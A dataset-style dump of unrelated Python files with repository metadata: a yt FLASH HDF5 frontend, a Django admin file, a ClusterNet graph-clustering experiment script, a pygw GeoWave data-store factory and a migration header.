if self._particle_handle != self._handle:
part_time = self._particle_handle.handle.get("real scalars")[0][1]
plot_time = self._handle.handle.get("real scalars")[0][1]
if not np.isclose(part_time, plot_time):
self._particle_handle = self._handle
mylog.warning(
"%s and %s are not at the same time. "
"This particle file will not be used.",
self.particle_filename,
filename,
)
# These should be explicitly obtained from the file, but for now that
# will wait until a reorganization of the source tree and better
# generalization.
self.refine_by = 2
Dataset.__init__(
self,
filename,
dataset_type,
units_override=units_override,
unit_system=unit_system,
default_species_fields=default_species_fields,
)
self.storage_filename = storage_filename
self.parameters["HydroMethod"] = "flash" # always PPM DE
self.parameters["Time"] = 1.0 # default unit is 1...
def _set_code_unit_attributes(self):
if "unitsystem" in self.parameters:
# Some versions of FLASH inject quotes in the runtime parameters
# See issue #1721
us = self["unitsystem"].replace("'", "").replace('"', "").lower()
if us == "cgs":
b_factor = 1.0
elif us == "si":
b_factor = np.sqrt(4 * np.pi / 1e7)
elif us == "none":
b_factor = np.sqrt(4 * np.pi)
else:
raise RuntimeError(
"Runtime parameter unitsystem with "
"value %s is unrecognized" % self["unitsystem"]
)
else:
b_factor = 1.0
if self.cosmological_simulation == 1:
length_factor = 1.0 / (1.0 + self.current_redshift)
temperature_factor = 1.0 / (1.0 + self.current_redshift) ** 2
else:
length_factor = 1.0
temperature_factor = 1.0
setdefaultattr(self, "magnetic_unit", self.quan(b_factor, "gauss"))
setdefaultattr(self, "length_unit", self.quan(length_factor, "cm"))
setdefaultattr(self, "mass_unit", self.quan(1.0, "g"))
setdefaultattr(self, "time_unit", self.quan(1.0, "s"))
setdefaultattr(self, "velocity_unit", self.quan(1.0, "cm/s"))
setdefaultattr(self, "temperature_unit", self.quan(temperature_factor, "K"))
def set_code_units(self):
super().set_code_units()
def _find_parameter(self, ptype, pname, scalar=False):
nn = "/{} {}".format(
ptype, {False: "runtime parameters", True: "scalars"}[scalar]
)
if nn not in self._handle:
raise KeyError(nn)
for tpname, pval in zip(
self._handle[nn][:, "name"], self._handle[nn][:, "value"]
):
if tpname.decode("ascii", "ignore").strip() == pname:
if hasattr(pval, "decode"):
pval = pval.decode("ascii", "ignore")
if ptype == "string":
return pval.strip()
else:
return pval
raise KeyError(pname)
def _parse_parameter_file(self):
if "file format version" in self._handle:
self._flash_version = int(self._handle["file format version"][:])
elif "sim info" in self._handle:
self._flash_version = int(
self._handle["sim info"][:]["file format version"]
)
else:
raise RuntimeError("Can't figure out FLASH file version.")
# First we load all of the parameters
hns = ["simulation parameters"]
# note the ordering here is important: runtime parameters should
# overwrite scalars with the same name.
for ptype in ["scalars", "runtime parameters"]:
for vtype in ["integer", "real", "logical", "string"]:
hns.append(f"{vtype} {ptype}")
if self._flash_version > 7:
for hn in hns:
if hn not in self._handle:
continue
for varname, val in zip(
self._handle[hn][:, "name"], self._handle[hn][:, "value"]
):
vn = varname.strip()
if hn.startswith("string"):
pval = val.strip()
else:
pval = val
if vn in self.parameters and self.parameters[vn] != pval:
mylog.info(
"%s %s overwrites a simulation scalar of the same name",
hn[:-1],
vn,
)
if hasattr(pval, "decode"):
pval = pval.decode("ascii", "ignore")
self.parameters[vn.decode("ascii", "ignore")] = pval
if self._flash_version == 7:
for hn in hns:
if hn not in self._handle:
continue
if hn == "simulation parameters":
zipover = (
(name, self._handle[hn][name][0])
for name in self._handle[hn].dtype.names
)
else:
zipover = zip(
self._handle[hn][:, "name"], self._handle[hn][:, "value"]
)
for varname, val in zipover:
vn = varname.strip()
if hasattr(vn, "decode"):
vn = vn.decode("ascii", "ignore")
if hn.startswith("string"):
pval = val.strip()
else:
pval = val
if vn in self.parameters and self.parameters[vn] != pval:
mylog.info(
"%s %s overwrites a simulation scalar of the same name",
hn[:-1],
vn,
)
if hasattr(pval, "decode"):
pval = pval.decode("ascii", "ignore")
self.parameters[vn] = pval
# Determine block size
try:
nxb = self.parameters["nxb"]
nyb = self.parameters["nyb"]
nzb = self.parameters["nzb"]
except KeyError:
nxb, nyb, nzb = (
int(self._handle["/simulation parameters"][f"n{ax}b"]) for ax in "xyz"
) # FLASH2 only!
# Determine dimensionality
try:
dimensionality = self.parameters["dimensionality"]
except KeyError:
dimensionality = 3
if nzb == 1:
dimensionality = 2
if nyb == 1:
dimensionality = 1
if dimensionality < 3:
mylog.warning("Guessing dimensionality as %s", dimensionality)
self.dimensionality = dimensionality
self.geometry = self.parameters["geometry"]
# Determine base grid parameters
if "lrefine_min" in self.parameters.keys(): # PARAMESH
nblockx = self.parameters["nblockx"]
nblocky = self.parameters["nblocky"]
nblockz = self.parameters["nblockz"]
else: # Uniform Grid
nblockx = self.parameters["iprocs"]
nblocky = self.parameters["jprocs"]
nblockz = self.parameters["kprocs"]
# In case the user wasn't careful
if self.dimensionality <= 2:
nblockz = 1
if self.dimensionality == 1:
nblocky = 1
# Determine domain boundaries
dle = np.array([self.parameters[f"{ax}min"] for ax in "xyz"]).astype("float64")
dre = np.array([self.parameters[f"{ax}max"] for ax in "xyz"]).astype("float64")
if self.dimensionality < 3:
for d in [dimensionality] + list(range(3 - dimensionality)):
if dle[d] == dre[d]:
mylog.warning(
"Identical domain left edge and right edges "
"along dummy dimension (%i), attempting to read anyway",
d,
)
dre[d] = dle[d] + 1.0
if self.dimensionality < 3 and self.geometry == "cylindrical":
mylog.warning("Extending theta dimension to 2PI + left edge.")
dre[2] = dle[2] + 2 * np.pi
elif self.dimensionality < 3 and self.geometry == "polar":
mylog.warning("Extending theta dimension to 2PI + left edge.")
dre[1] = dle[1] + 2 * np.pi
elif self.dimensionality < 3 and self.geometry == "spherical":
mylog.warning("Extending phi dimension to 2PI + left edge.")
dre[2] = dle[2] + 2 * np.pi
if self.dimensionality == 1 and self.geometry == "spherical":
mylog.warning("Extending theta dimension to PI + left edge.")
dre[1] = dle[1] + np.pi
self.domain_left_edge = dle
self.domain_right_edge = dre
self.domain_dimensions = np.array([nblockx * nxb, nblocky * nyb, nblockz * nzb])
# Try to determine Gamma
try:
self.gamma = self.parameters["gamma"]
except Exception:
mylog.info("Cannot find Gamma")
pass
# Get the simulation time
self.current_time = self.parameters["time"]
# Determine if this is a periodic box
p = [
self.parameters.get(f"{ax}l_boundary_type", None) == "periodic"
for ax in "xyz"
]
self._periodicity = tuple(p)
# Determine cosmological parameters.
try:
self.parameters["usecosmology"]
self.cosmological_simulation = 1
self.current_redshift = 1.0 / self.parameters["scalefactor"] - 1.0
self.omega_lambda = self.parameters["cosmologicalconstant"]
self.omega_matter = self.parameters["omegamatter"]
self.hubble_constant = self.parameters["hubbleconstant"]
self.hubble_constant *= cm_per_mpc * 1.0e-5 * 1.0e-2 # convert to 'h'
except Exception:
self.current_redshift = 0.0
self.omega_lambda = 0.0
self.omega_matter = 0.0
self.hubble_constant = 0.0
self.cosmological_simulation = 0
@classmethod
def _is_valid(cls, filename, *args, **kwargs):
try:
fileh = HDF5FileHandler(filename)
if "bounding box" in fileh["/"].keys():
return True
except (OSError, ImportError):
pass
return False
@classmethod
def _guess_candidates(cls, base, directories, files):
candidates = [
_ for _ in files if ("_hdf5_plt_cnt_" in _) or ("_hdf5_chk_" in _)
]
# Typically, Flash won't have nested outputs.
return candidates, (len(candidates) == 0)
def close(self):
self._handle.close()
class FLASHParticleFile(ParticleFile):
pass
class FLASHParticleDataset(FLASHDataset):
_index_class = ParticleIndex
filter_bbox = False
_file_class = FLASHParticleFile
def __init__(
self,
filename,
dataset_type="flash_particle_hdf5",
storage_filename=None,
units_override=None,
index_order=None,
index_filename=None,
unit_system="cgs",
):
self.index_order = validate_index_order(index_order)
self.index_filename = index_filename
if self._handle is not None:
return
self._handle = HDF5FileHandler(filename)
self.refine_by = 2
Dataset.__init__(
self,
filename,
dataset_type,
units_override=units_override,
unit_system=unit_system,
)
self.storage_filename = storage_filename
def _parse_parameter_file(self):
# Let the superclass do all the work but then
# fix the domain dimensions
super()._parse_parameter_file()
domain_dimensions = np.zeros(3, "int32")
domain_dimensions[: self.dimensionality] = 1
self.domain_dimensions = domain_dimensions
self.filename_template = self.parameter_filename
self.file_count = 1
@classmethod
def _is_valid(cls, filename, *args, **kwargs):
warn_h5py(filename)
try:
fileh = HDF5FileHandler(filename)
if (
"bounding box" not in fileh["/"].keys()
and "localnp" in fileh["/"].keys()
):
return True
except (OSError, ImportError):
pass
return False
@classmethod
def _guess_candidates(cls, base, directories, files):
candidates = [_ for _ in files if "_hdf5_part_" in _]
# Typically, Flash won't have nested outputs.
return candidates, (len(candidates) == 0)
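# Usage sketch (not part of the original frontend): these classes are normally reached
# through yt.load(), which runs the _is_valid() checks above to pick the right Dataset
# subclass. The file names below are hypothetical examples.
#
#     import yt
#     ds = yt.load("sloshing_hdf5_plt_cnt_0100")    # plotfile with "bounding box" -> FLASHDataset
#     dd = ds.all_data()
#     ds_part = yt.load("sloshing_hdf5_part_0100")  # particle file with "localnp" -> FLASHParticleDataset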
| 38.03125
| 88
| 0.548649
|
61eebe20a08fe467ba98f06fdd75ab35ae20588a
| 100
|
py
|
Python
|
src/associations/admin.py
|
codacy-badger/hbscorez
|
215e4d2617ac9be91bb9d561bbfc552349cd4781
|
[
"MIT"
] | 12
|
2018-03-20T21:38:53.000Z
|
2021-10-31T10:00:12.000Z
|
src/associations/admin.py
|
codacy-badger/hbscorez
|
215e4d2617ac9be91bb9d561bbfc552349cd4781
|
[
"MIT"
] | 79
|
2018-03-18T14:26:47.000Z
|
2022-03-01T15:51:40.000Z
|
src/associations/admin.py
|
codacy-badger/hbscorez
|
215e4d2617ac9be91bb9d561bbfc552349cd4781
|
[
"MIT"
] | 4
|
2018-05-18T15:39:56.000Z
|
2020-10-29T09:28:41.000Z
|
from django.contrib import admin
from .models import Association
admin.site.register(Association)
| 16.666667
| 32
| 0.83
|
2cbcdd913913e88463399e07575b6a9bd2e61922
| 21,719
|
py
|
Python
|
experiments_singlegraph.py
|
wangshgeo/clusternet
|
06904af279b4d98d894f3e33173ece2d62cffa2d
|
[
"MIT"
] | null | null | null |
experiments_singlegraph.py
|
wangshgeo/clusternet
|
06904af279b4d98d894f3e33173ece2d62cffa2d
|
[
"MIT"
] | null | null | null |
experiments_singlegraph.py
|
wangshgeo/clusternet
|
06904af279b4d98d894f3e33173ece2d62cffa2d
|
[
"MIT"
] | null | null | null |
from pygcn import load_data
import torch
import argparse
import numpy as np
import torch.optim as optim
import torch.nn as nn
import sklearn
from kcenter import make_all_dists, greedy_kcenter, gonzalez_kcenter, CenterObjective, make_dists_igraph, rounding
from models import GCNLink, GCNClusterNet, GCNDeep, GCNDeepSigmoid, GCN
from utils import make_normalized_adj, negative_sample, edge_dropout, load_nofeatures
from modularity import baseline_spectral, partition, greedy_modularity_communities, make_modularity_matrix
from loss_functions import loss_kcenter, loss_modularity
parser = argparse.ArgumentParser()
parser.add_argument('--no-cuda', action='store_true', default=True,
help='Disables CUDA training.')
parser.add_argument('--seed', type=int, default=24, help='Random seed.')
parser.add_argument('--lr', type=float, default=0.01,
help='Initial learning rate.')
parser.add_argument('--weight_decay', type=float, default=5e-4,
help='Weight decay (L2 loss on parameters).')
parser.add_argument('--hidden', type=int, default=50,
help='Number of hidden units.')
parser.add_argument('--dropout', type=float, default=0.5,
help='Dropout rate (1 - keep probability).')
parser.add_argument('--embed_dim', type=int, default=50,
help='Dimensionality of node embeddings')
parser.add_argument('--K', type=int, default=5,
help='How many partitions')
parser.add_argument('--negsamplerate', type=int, default=1,
help='How many negative examples to include per positive in link prediction training')
parser.add_argument('--edge_dropout', type=float, default=0.2,
help='Rate at which to remove edges in link prediction training')
parser.add_argument('--objective', type=str, default='modularity',
                    help='What objective to optimize (currently kcenter or modularity)')
parser.add_argument('--dataset', type=str, default='citeseer',
help='which network to load')
parser.add_argument('--clustertemp', type=float, default=30,
help='how hard to make the softmax for the cluster assignments')
parser.add_argument('--kcentertemp', type=float, default=100,
help='how hard to make seed selection softmax assignment')
parser.add_argument('--kcentermintemp', type=float, default=0,
help='how hard to make the min over nodes in kcenter training objective')
parser.add_argument('--train_pct', type=float, default=0.4, help='percent of total edges in training set')
parser.add_argument('--calculate_opt', action='store_true', default=False, help='calculate opt')
parser.add_argument('--pure_opt', action='store_true', default=False, help='do only optimization, no link prediction needed')
parser.add_argument('--use_igraph', action='store_true', default=True, help='use igraph to compute shortest paths in twostage kcenter')
parser.add_argument('--run_ts', action='store_true', default=False, help='run the two-stage link prediction baseline')
parser.add_argument('--train_iters', type=int, default=1001,
help='number of training iterations')
parser.add_argument('--num_cluster_iter', type=int, default=1,
help='number of iterations for clustering')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
print(args.cuda)
if torch.cuda.is_available():
    args.cuda = True  # args.no_cuda and torch.cuda.is_available()
print(args.cuda)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.cuda:
torch.cuda.manual_seed(args.seed)
pure_opt = args.pure_opt
reload_data = True
test_cluster_auc = False
calculate_opt = args.calculate_opt
make_objectives = False
if reload_data:
make_objectives = True
calculate_dists = False
run_decision = True
run_ts = args.run_ts
run_gcne2e = True
run_train_only = True
has_features = True
##############################################################################
#LOAD DATA
##############################################################################
train_pct = args.train_pct
if reload_data:
if has_features:
adj_test, features_test, labels, idx_train, idx_val, idx_test = load_data('data/{}/'.format(args.dataset), '{}_test_{:.2f}'.format(args.dataset, train_pct))
adj_valid, features_valid, labels, idx_train, idx_val, idx_test = load_data('data/{}/'.format(args.dataset), '{}_valid_{:.2f}'.format(args.dataset, train_pct))
adj_train, features_train, labels, idx_train, idx_val, idx_test = load_data('data/{}/'.format(args.dataset), '{}_train_{:.2f}'.format(args.dataset, train_pct))
else:
adj_all, features, labels = load_nofeatures(args.dataset, '')
features_train = features
features_test = features
n = adj_all.shape[0]
adj_train, features, labels = load_nofeatures(args.dataset, '_train_{:.2f}'.format(train_pct), n)
adj_test, features, labels = load_nofeatures(args.dataset, '_test_{:.2f}'.format(train_pct), n)
adj_valid, features, labels = load_nofeatures(args.dataset, '_valid_{:.2f}'.format(train_pct), n)
adj_test = adj_test.coalesce()
adj_valid = adj_valid.coalesce()
adj_train = adj_train.coalesce()
n = adj_train.shape[0]
K = args.K
bin_adj_test = (adj_test.to_dense() > 0).float()
bin_adj_train = (adj_train.to_dense() > 0).float()
m_train = bin_adj_train.sum()
bin_adj_valid = (adj_valid.to_dense() > 0).float()
bin_adj_all = (bin_adj_train + bin_adj_test + bin_adj_valid > 0).float()
adj_all = make_normalized_adj(bin_adj_all.nonzero(), n)
nfeat = features_test.shape[1]
adj_all, features_test, labels, idx_train, idx_val, idx_test = load_data('data/{}/'.format(args.dataset), '{}'.format(args.dataset))
adj_all = adj_all.coalesce()
adj_test = adj_all
bin_adj_all = (adj_all.to_dense() > 0).float()
n = adj_all.shape[0]
    K = args.K
nfeat = features_test.shape[1]
##############################################################################
#INITIALIZE MODELS
##############################################################################
# Model and optimizer
model_ts = GCNLink(nfeat=nfeat,
nhid=args.hidden,
nout=args.embed_dim,
dropout=args.dropout)
model_cluster = GCNClusterNet(nfeat=nfeat,
nhid=args.hidden,
nout=args.embed_dim,
dropout=args.dropout,
K = args.K,
cluster_temp = args.clustertemp)
#keep a couple of initializations here so that the random seeding lines up
#with results reported in the paper -- removing these is essentially equivalent to
#changing the seed
_ = GCN(nfeat, args.hidden, args.embed_dim, args.dropout)
_ = nn.Parameter(torch.rand(K, args.embed_dim))
#uses GCNs to predict the cluster membership of each node
model_gcn = GCNDeep(nfeat=nfeat,
nhid=args.hidden,
nout=args.K,
dropout=args.dropout,
nlayers=2)
#uses GCNs to predict the probability that each node appears in the solution
model_gcn_x = GCNDeepSigmoid(nfeat=nfeat,
nhid=args.hidden,
nout=1,
dropout=args.dropout,
nlayers=2)
if args.objective == 'kcenter':
model_gcn = model_gcn_x
optimizer = optim.Adam(model_cluster.parameters(),
lr=args.lr, weight_decay=args.weight_decay)
if args.cuda:
model_cluster.cuda()
model_ts.cuda()
features = features.cuda()
adj_train = adj_train.cuda()
labels = labels.cuda()
idx_train = idx_train.cuda()
idx_val = idx_val.cuda()
idx_test = idx_test.cuda()
losses = []
losses_test = []
num_cluster_iter = args.num_cluster_iter
##############################################################################
#MAKE AUXILIARY DATA FOR OBJECTIVES
##############################################################################
if make_objectives:
if args.objective == 'kcenter':
try:
dist_all = torch.load('{}_test_dist.pt'.format(args.dataset))
dist_train = torch.load('{}_{}_train_dist.pt'.format(args.dataset, train_pct))
diameter = dist_all.max()
except:
dist_all = make_all_dists(bin_adj_all, 100)
diameter = dist_all[dist_all < 100].max()
dist_all[dist_all == 100] = diameter
torch.save(dist_all, '{}_test_dist.pt'.format(args.dataset))
dist_train = make_all_dists(bin_adj_train, 100)
dist_train[dist_train == 100] = diameter
torch.save(dist_train, '{}_{}_train_dist.pt'.format(args.dataset, train_pct))
obj_train = CenterObjective(dist_train, diameter, args.kcentermintemp)
obj_train_hardmax = CenterObjective(dist_train, diameter, args.kcentermintemp, hardmax=True)
obj_test = CenterObjective(dist_all, diameter, args.kcentertemp, hardmax=True)
obj_test_softmax = CenterObjective(dist_all, diameter, args.kcentermintemp)
if args.objective == 'modularity':
mod_train = make_modularity_matrix(bin_adj_train)
mod_test = make_modularity_matrix(bin_adj_test)
mod_valid = make_modularity_matrix(bin_adj_valid)
mod_all = make_modularity_matrix(bin_adj_all)
##############################################################################
#DEFINE LOSS FUNCTIONS
##############################################################################
if args.objective == 'modularity':
loss_fn = loss_modularity
test_object = mod_all
train_object = mod_train
test_only_object = mod_test
valid_object = mod_valid
elif args.objective == 'kcenter':
loss_fn = loss_kcenter
test_object= obj_test
train_object = obj_train
test_only_object = None
valid_object = None
else:
raise Exception('unknown objective')
##############################################################################
#TRAIN DECISION-FOCUSED
##############################################################################
#Decision-focused training
best_train_val = 100
if run_decision:
for t in range(args.train_iters):
#pure optimization setting: get loss with respect to the full graph
if pure_opt:
mu, r, embeds, dist = model_cluster(features_test, adj_all, num_cluster_iter)
loss = loss_fn(mu, r, embeds, dist, bin_adj_all, test_object, args)
#link prediction setting: get loss with respect to training edges only
else:
mu, r, embeds, dist = model_cluster(features_train, adj_train, num_cluster_iter)
loss = loss_fn(mu, r, embeds, dist, bin_adj_train, train_object, args)
if args.objective != 'kcenter':
loss = -loss
optimizer.zero_grad()
loss.backward()
#increase number of clustering iterations after 500 updates to fine-tune
#solution
if t == 500:
num_cluster_iter = 5
#every 100 iterations, look and see if we've improved on the best training loss
#seen so far. Keep the solution with best training value.
if t % 100 == 0:
#round solution to discrete partitioning
if args.objective == 'modularity':
r = torch.softmax(100*r, dim=1)
            #evaluate test loss -- note that the best solution is
            #chosen with respect to training loss. Here, we store the test loss
            #of the currently best training solution
loss_test = loss_fn(mu, r, embeds, dist, bin_adj_all, test_object, args)
#for k-center problem, keep track of the fractional x with best
#training loss, to do rounding after
if loss.item() < best_train_val:
best_train_val = loss.item()
curr_test_loss = loss_test.item()
#convert distances into a feasible (fractional x)
x_best = torch.softmax(dist*args.kcentertemp, 0).sum(dim=1)
x_best = 2*(torch.sigmoid(4*x_best) - 0.5)
if x_best.sum() > K:
x_best = K*x_best/x_best.sum()
losses.append(loss.item())
optimizer.step()
#for k-center: round 50 times and take the solution with best training
#value
if args.objective == 'kcenter':
testvals = []; trainvals = []
for _ in range(50):
y = rounding(x_best)
testvals.append(obj_test(y).item())
trainvals.append(obj_train(y).item())
print('ClusterNet value', testvals[np.argmin(trainvals)])
if args.objective == 'modularity':
print('ClusterNet value', curr_test_loss)
##############################################################################
#TRAIN TWO-STAGE
##############################################################################
def train_twostage(model_ts):
optimizer_ts = optim.Adam(model_ts.parameters(),
lr=args.lr, weight_decay=args.weight_decay)
edges = adj_train.indices().t()
edges_test = adj_test.indices().t()
edges_test_eval, labels_test_eval = negative_sample(edges_test, 1, bin_adj_train)
# print(edges_test_eval)
for t in range(300):
adj_input = make_normalized_adj(edge_dropout(edges, args.edge_dropout), n)
edges_eval, labels = negative_sample(edges, args.negsamplerate, bin_adj_train)
preds = model_ts(features_train, adj_input, edges_eval)
loss = torch.nn.BCEWithLogitsLoss()(preds, labels)
optimizer_ts.zero_grad()
loss.backward()
if t % 10 == 0:
preds_test_eval = model_ts(features_train, adj_input, edges_test_eval)
test_ce = torch.nn.BCEWithLogitsLoss()(preds_test_eval, labels_test_eval)
test_auc = sklearn.metrics.roc_auc_score(labels_test_eval.long().detach().numpy(), nn.Sigmoid()(preds_test_eval).detach().numpy())
print(t, loss.item(), test_ce.item(), test_auc)
optimizer_ts.step()
if test_cluster_auc:
model_linkpred = GCNLink(nfeat=nfeat,
nhid=args.hidden,
nout=args.embed_dim,
dropout=args.dropout)
model_linkpred.GCN = model_cluster.GCN
model_linkpred.GCN.requires_grad = False
train_twostage(model_linkpred)
calculate_ts_performance = False
if run_ts:
print('two stage')
train_twostage(model_ts)
#predict probability that all unobserved edges exist
indices = torch.tensor(np.arange(n))
to_pred = torch.zeros(n**2, 2)
to_pred[:, 1] = indices.repeat(n)
for i in range(n):
to_pred[i*n:(i+1)*n, 0] = i
to_pred = to_pred.long()
preds = model_ts(features_train, adj_train, to_pred)
preds = nn.Sigmoid()(preds).view(n, n)
preds = bin_adj_train + (1 - bin_adj_train)*preds
if args.objective == 'modularity':
r = greedy_modularity_communities(preds, K)
print('agglomerative', loss_fn(None, r, None, None, bin_adj_all, test_object, args))
r = partition(preds, K)
print('recursive', loss_fn(None, r, None, None, bin_adj_all, test_object, args))
degrees = preds.sum(dim=1)
preds = torch.diag(1./degrees)@preds
mod_pred = make_modularity_matrix(preds)
r = baseline_spectral(mod_pred, K)
print('spectral', loss_fn(None, r, None, None, bin_adj_all, test_object, args))
elif args.objective == 'kcenter':
try:
dist_ts = torch.load('{}_twostage_dist.pt'.format(args.dataset))
print('loaded ts dists from {}'.format('{}_twostage_dist.pt'.format(args.dataset)))
except:
print('making dists')
if args.use_igraph:
print('using igraph')
dist_ts = make_dists_igraph(preds)
else:
print('using networkx')
dist_ts = make_all_dists(preds, 100)
diameter = dist_ts[dist_ts < 100].max()
dist_ts[dist_ts == 100] = diameter
print('made dists')
torch.save(dist_ts, '{}_twostage_dist.pt'.format(args.dataset))
dist_ts = dist_ts.float()
diameter = dist_ts.max()
x = gonzalez_kcenter(dist_ts, K)
print('gonzalez ts', obj_train_hardmax(x), obj_test(x))
print(dist_ts.type(), diameter.type())
x = greedy_kcenter(dist_ts, diameter, K)
print('greedy ts', obj_train_hardmax(x), obj_test(x))
##############################################################################
#TRAIN END-TO-END GCN
##############################################################################
if run_gcne2e:
print('just GCN')
optimizer_gcn = optim.Adam(model_gcn.parameters(), lr = args.lr,
weight_decay = args.weight_decay)
if args.objective == 'modularity':
best_train_val = 0
if args.objective == 'kcenter':
best_train_val = 100
for t in range(1000):
best_train_loss = 100
if pure_opt:
if args.objective == 'modularity' or args.objective == 'maxcut':
r = model_gcn(features_test, adj_all)
r = torch.softmax(args.clustertemp*r, dim = 1)
loss = -loss_fn(None, r, None, None, bin_adj_train, train_object, args)
            elif args.objective == 'kcenter' or args.objective == 'influmax':
x = model_gcn(features_test, adj_all)
if x.sum() > K:
x = K*x/x.sum()
loss = -test_object(x)
else:
if args.objective == 'modularity' or args.objective == 'maxcut':
r = model_gcn(features_train, adj_train)
r = torch.softmax(r, dim = 1)
loss = -loss_fn(None, r, None, None, bin_adj_train, train_object, args)
            elif args.objective == 'kcenter' or args.objective == 'influmax':
x = model_gcn(features_train, adj_train)
if x.sum() > K:
x = K*x/x.sum()
loss = -train_object(x)
if args.objective == 'kcenter':
loss = -loss
        # update the end-to-end GCN baseline with its own optimizer
        optimizer_gcn.zero_grad()
loss.backward()
if t % 100 == 0:
if args.objective == 'modularity' or args.objective == 'maxcut':
r = torch.softmax(100*r, dim=1)
loss_test = loss_fn(None, r, None, None, bin_adj_all, test_object, args)
loss_test_only = loss_fn(None, r, None, None, bin_adj_test, test_only_object, args)
            elif args.objective == 'kcenter' or args.objective == 'influmax':
loss_test = -test_object(x)
loss_test_only = torch.tensor(0).float()
losses_test.append(loss_test.item())
print(t, loss.item(), loss_test.item(), loss_test_only.item())
if loss.item() < best_train_val:
curr_test_loss = loss_test.item()
best_train_val = loss.item()
if args.objective == 'kcenter' or args.objective == 'influmax':
x_best = x
losses.append(loss.item())
        optimizer_gcn.step()
if args.objective == 'kcenter':
from influmax import rounding
testvals = []; trainvals = []; trainvalshardmax = []
for _ in range(50):
y = rounding(x_best)
testvals.append(obj_test(y).item())
trainvals.append(obj_train(y).item())
trainvalshardmax.append(obj_train_hardmax(y).item())
print('train min', testvals[np.argmin(trainvals)])
print('hardmax train min', testvals[np.argmin(trainvalshardmax)])
print('absolute min', min(testvals))
if args.objective == 'modularity':
print('train min', curr_test_loss)
##############################################################################
#TRAIN-ONLY BASELINE
##############################################################################
if run_train_only:
if args.objective == 'modularity':
preds = bin_adj_train
r = greedy_modularity_communities(preds, K)
print('agglomerative', loss_fn(None, r, None, None, bin_adj_all, test_object, args))
r = partition(preds, K)
print('recursive', loss_fn(None, r, None, None, bin_adj_all, test_object, args))
degrees = preds.sum(dim=1)
preds = torch.diag(1./degrees)@preds
mod_pred = make_modularity_matrix(preds)
r = baseline_spectral(mod_pred, K)
print('spectral', loss_fn(None, r, None, None, bin_adj_all, test_object, args))
elif args.objective == 'kcenter':
x = gonzalez_kcenter(dist_train, K)
print('gonzalez train', obj_test(x))
x = greedy_kcenter(dist_train, diameter, K)
print('greedy train', obj_test(x))
##############################################################################
#RUN BASELINE OPTIMIZATION ALGORITHMS ON FULL GRAPH
##############################################################################
if calculate_opt:
if args.objective == 'modularity':
preds = bin_adj_all
r = greedy_modularity_communities(preds, K)
print('agglomerative', loss_fn(None, r, None, None, bin_adj_all, test_object, args))
r = partition(preds, K)
print('recursive', loss_fn(None, r, None, None, bin_adj_all, test_object, args))
degrees = preds.sum(dim=1)
preds = torch.diag(1./degrees)@preds
mod_pred = make_modularity_matrix(preds)
r = baseline_spectral(mod_pred, K)
print('spectral', loss_fn(None, r, None, None, bin_adj_all, test_object, args))
elif args.objective == 'kcenter':
x = gonzalez_kcenter(dist_all, K)
print('gonzalez all', obj_test(x))
x = greedy_kcenter(dist_all, diameter, K)
print('greedy all', obj_test(x))
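# Invocation sketch (inferred from the argparse definitions above, not part of the original script):
#
#     python experiments_singlegraph.py --objective modularity --dataset citeseer --K 5 --train_iters 1001
#
# For --objective kcenter, pairwise distances are computed once and cached to
# '<dataset>_test_dist.pt' and '<dataset>_<train_pct>_train_dist.pt' (see the
# "MAKE AUXILIARY DATA FOR OBJECTIVES" block above).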
| 43.61245
| 167
| 0.607026
|
8cc92739898e560a182b7af4b9579515e47e8dfd
| 110
|
py
|
Python
|
debug_diverse_data.py
|
williamdjones/proteinbinding
|
853d8c81afb19c6d8de9be7080ae00a54836dda1
|
[
"MIT"
] | 1
|
2018-03-14T02:26:17.000Z
|
2018-03-14T02:26:17.000Z
|
debug_diverse_data.py
|
williamdjones/proteinbinding
|
853d8c81afb19c6d8de9be7080ae00a54836dda1
|
[
"MIT"
] | 9
|
2017-03-23T15:48:15.000Z
|
2017-04-20T16:37:49.000Z
|
debug_diverse_data.py
|
williamdjones/protein_binding
|
853d8c81afb19c6d8de9be7080ae00a54836dda1
|
[
"MIT"
] | null | null | null |
import pandas as pd
import os
docking_df = pd.read_csv("data/diverse/docking_features_diverse_subset.csv")
| 15.714286
| 76
| 0.809091
|
6ddec07e10f79c4dbf7b96e57c3594dd8f99f0f9
| 1,313
|
py
|
Python
|
python/src/main/python/pygw/store/data_store_factory.py
|
Maxar-Corp/sh-geowave
|
675781d3898b50c09ee66f57e74cf788286b05d5
|
[
"Apache-2.0"
] | null | null | null |
python/src/main/python/pygw/store/data_store_factory.py
|
Maxar-Corp/sh-geowave
|
675781d3898b50c09ee66f57e74cf788286b05d5
|
[
"Apache-2.0"
] | null | null | null |
python/src/main/python/pygw/store/data_store_factory.py
|
Maxar-Corp/sh-geowave
|
675781d3898b50c09ee66f57e74cf788286b05d5
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright (c) 2013-2020 Contributors to the Eclipse Foundation
#
# See the NOTICE file distributed with this work for additional information regarding copyright
# ownership. All rights reserved. This program and the accompanying materials are made available
# under the terms of the Apache License, Version 2.0 which accompanies this distribution and is
# available at http://www.apache.org/licenses/LICENSE-2.0.txt
#===============================================================================================
from pygw.config import geowave_pkg
from .data_store import DataStore
from .data_store_options import DataStoreOptions
class DataStoreFactory():
"""
Factory class for creating a data store from a given set of options.
"""
@classmethod
def create_data_store(cls, options):
"""
Creates a data store from a set of options for a specific backend type.
Args:
options (pygw.store.data_store_options.DataStoreOptions): The options for the data store.
Returns:
The `pygw.store.data_store.DataStore` referenced by the given options.
"""
assert isinstance(options, DataStoreOptions)
j_ds = geowave_pkg.core.store.api.DataStoreFactory.createDataStore(options._java_ref)
return DataStore(j_ds)
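# Usage sketch (illustrative only; the RocksDB backend and its import path are assumptions,
# any concrete DataStoreOptions subclass is used the same way):
#
#     from pygw.store.rocksdb import RocksDBOptions  # assumed backend/options class
#     options = RocksDBOptions()
#     options.set_geowave_namespace("example")       # assumed option setter
#     store = DataStoreFactory.create_data_store(options)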
| 38.617647
| 101
| 0.678599
|
4e4feeb853ab1749a6f011e2ea5852f46e743cac
| 1,709
|
py
|
Python
|
app/core/migrations/0001_initial.py
|
FabianIAM12/recipe-app-api
|
a529248270db2220a5936fa4c662091048f2c0bf
|
[
"MIT"
] | null | null | null |
app/core/migrations/0001_initial.py
|
FabianIAM12/recipe-app-api
|
a529248270db2220a5936fa4c662091048f2c0bf
|
[
"MIT"
] | null | null | null |
app/core/migrations/0001_initial.py
|
FabianIAM12/recipe-app-api
|
a529248270db2220a5936fa4c662091048f2c0bf
|
[
"MIT"
] | null | null | null |
